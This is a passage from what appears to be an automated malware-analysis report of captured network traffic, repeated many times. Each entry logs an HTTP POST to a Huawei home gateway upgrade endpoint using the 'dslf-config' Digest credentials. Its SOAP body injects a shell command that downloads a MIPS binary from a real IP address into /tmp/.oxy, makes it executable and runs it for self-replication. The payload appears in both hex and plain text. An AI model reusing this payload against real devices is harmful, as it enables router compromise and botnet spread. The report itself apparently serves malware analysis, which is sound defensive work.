xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.224.131.230 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 457Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 32 32 34 2e 31 33 31 2e 32 33 30 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.224.131.230 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 457Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 32 32 34 2e 31 33 31 2e 32 33 30 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.224.131.230 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 457Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 32 32 34 2e 31 33 31 2e 32 33 30 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.224.131.230 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 457Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 32 32 34 2e 31 33 31 2e 32 33 30 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.224.131.230 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 457Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 32 32 34 2e 31 33 31 2e 32 33 30 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.224.131.230 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 457Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 32 32 34 2e 31 33 31 2e 32 33 30 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.224.131.230 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 457Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 32 32 34 2e 31 33 31 2e 32 33 30 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.224.131.230 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 457Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 32 32 34 2e 31 33 31 2e 32 33 30 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.224.131.230 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 457Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 32 32 34 2e 31 33 31 2e 32 33 30 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.224.131.230 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 457Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 